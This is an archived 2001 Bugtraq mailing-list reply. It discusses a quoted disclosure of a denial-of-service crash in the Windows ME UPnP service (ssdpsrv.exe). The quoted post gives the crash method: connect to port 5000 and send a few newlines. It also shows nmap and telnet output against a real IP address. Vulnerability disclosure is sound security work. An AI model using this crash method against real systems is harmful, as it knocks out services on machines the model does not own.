Last night after I got home from work, I checked my Dell Laptop (which came with ME preinstalled) and it too is running the ssdpsrv. The only things I've installed on it since I purchased it are Office 2000, IE6, and the software/support drivers for my digital camera. All of which I don't think would have turned it on (although I could be wrong). After reading up on UPnP though, I think the triggering item might be Home Networking, or whatever it's called in ME. I don't personally recall turning it on, as my laptop automagically selected all the proper settings for my ISP (which was kinda nice, and scary at the same time). The knowledge base article seems to suggest that UPnP is not turned on by default, but it's possible some OEMs might have it enabled. Finally, I was not able to duplicate the crash, even though I did receive the 400 Bad Request response. Of course, I was busy fixing dinner at the time as well, so that might not mean anything ;) Martin L. Drury Jr. Advance Data Systems, Inc. 502-228-3396 x117 mdrury@ads-corp.com > -----Original Message----- > From: milo omega [mailto:mtwoarat_private] > Sent: Wednesday, October 17, 2001 8:46 PM > To: bugtraqat_private > Subject: Ssdpsrv.exe in WindowsME > > > By connecting to a computer running Ssdpsrv you are able to crash the > Ssdpsrv server. > > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes. > This service comes standard with the WindowsME installation. > > The Ssdpsrv.exe server is started at boot. > Here is the registry entry: > KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices > Here is the file that starts the server: > c:\windows\system\ssdpsrv.exe > > For information about UPnP go here: > http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP > > Upon running a scan on a computer running the server I get the following: > <snip> > bash-2.05$ nmap -sT 165.121.234.217 > Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ ) > Interesting ports on user-2injqmp.dialup.mindspring.com > (165.121.234.217): > (The 1547 ports scanned but not shown below are in state: closed) > Port State Service > 139/tcp open netbios-ssn > 5000/tcp open fics > Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds > </snap> > > Method to crash Ssdpsrv: > Connect to the computer on port 5000. > Send 3 to 5 newline characters. > You then get an error and are disconnected. > <snip> > bash-2.05$ telnet 165.121.234.217 5000 > Trying 165.121.234.217... > Connected to 165.121.234.217. > Escape character is '^]'. > > > > HTTP/1.1 400 Bad Request > > Connection closed by foreign host. > bash-2.05$ > </snap> > > Here is the error caused by the crash: > Ssdpsrv has caused an error in MSVCRT.DLL. > Ssdpsrv will now close. > If you continue to experience problems, > try restarting your computer. > > This causes the server crash and closes port 5000. > Either you must restart the server by manually running ssdpsrv.exe > or reboot. > > shouts to pulltheplug #c. > :o > > _________________________________________________________________ > Get your FREE download of MSN Explorer at > http://explorer.msn.com/intl.asp
This archive was generated by hypermail 2b30 : Fri Oct 19 2001 - 16:02:03 PDT